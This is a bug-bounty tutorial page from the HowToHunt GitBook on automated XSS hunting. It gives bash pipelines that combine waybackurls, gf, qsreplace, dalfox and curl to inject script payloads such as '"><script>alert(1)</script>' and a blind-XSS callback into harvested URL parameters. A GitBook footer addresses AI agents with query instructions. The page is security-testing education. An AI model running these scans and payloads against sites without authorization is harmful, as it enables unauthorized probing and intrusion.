> For the complete documentation index, see [llms.txt](https://kathan19.gitbook.io/howtohunt/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kathan19.gitbook.io/howtohunt/xss/automated_xss.md).

# Automated XSS

## Prerequisites: Installing Go on Your Machine

Before proceeding, ensure that **Go** is installed on your system. You can install it using the following commands:

```bash
sudo apt install -y golang
export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
source .bashrc
```

***

## Hunting Blind XSS Using Dalfox

To detect blind XSS vulnerabilities, follow these steps:

1. Use **WaybackURLs** to extract URLs for the target.
2. Use **GF patterns** to identify possible XSS-vulnerable parameters.
3. Utilize **Dalfox** to detect XSS.

### Execution Command:

```bash
waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && \
cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt
```

***

## Hunting Reflected XSS

To identify reflected XSS vulnerabilities, follow these steps:

1. Extract URLs using **WaybackURLs**.
2. Use **qsreplace** to inject payloads and analyze responses.

### Execution Command:

```bash
waybackurls testphp.vulnweb.com | grep '=' | qsreplace '"><script>alert(1)</script>' | \
while read host; do
    curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && \
    echo "$host \033[0;31m Vulnerable"
done
```

***

## Identifying Parameters That Do Not Filter Special Characters

The following command checks whether parameters accept special characters without proper sanitization:

```bash
echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt
cat waybackurls.txt | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | \
qsreplace '"><()' | tee combinedfuzz.json && \
cat combinedfuzz.json | while read host; do
    curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && \
    echo -e "$host \033[91m Vulnerable \e[0m \n" || \
    echo -e "$host \033[92m Not Vulnerable \e[0m \n"
done | tee XSS.txt
```

***

## Downloading the Required Tools

The following tools are required for this process:

| Tool            | GitHub Repository                                        |
| --------------- | -------------------------------------------------------- |
| **Dalfox**      | [Dalfox](https://github.com/hahwul/dalfox)               |
| **WaybackURLs** | [WaybackURLs](https://github.com/tomnomnom/waybackurls)  |
| **GF**          | [GF](https://github.com/tomnomnom/gf)                    |
| **GF Patterns** | [GF Patterns](https://github.com/1ndianl33t/Gf-Patterns) |
| **qsreplace**   | [qsreplace](https://github.com/tomnomnom/qsreplace)      |

A complete script can be found here: [QuickXSS](https://github.com/theinfosecguy/QuickXSS)

***

## Contact Information

For any questions or further discussions, feel free to reach out on Twitter:

* [@g0t\_rOoT\_](https://twitter.com/g0t_rOoT_)
* [@Fani Malik](https://twitter.com/fanimalikhack)
* [@Faizee Asad](https://twitter.com/faizee_asad)
* [@Prince Prafull](https://twitter.com/princeprafull3)

***

*Enhanced and reformatted for HowToHunt repository by* [*remonsec*](https://x.com/remonsec)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://kathan19.gitbook.io/howtohunt/xss/automated_xss.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.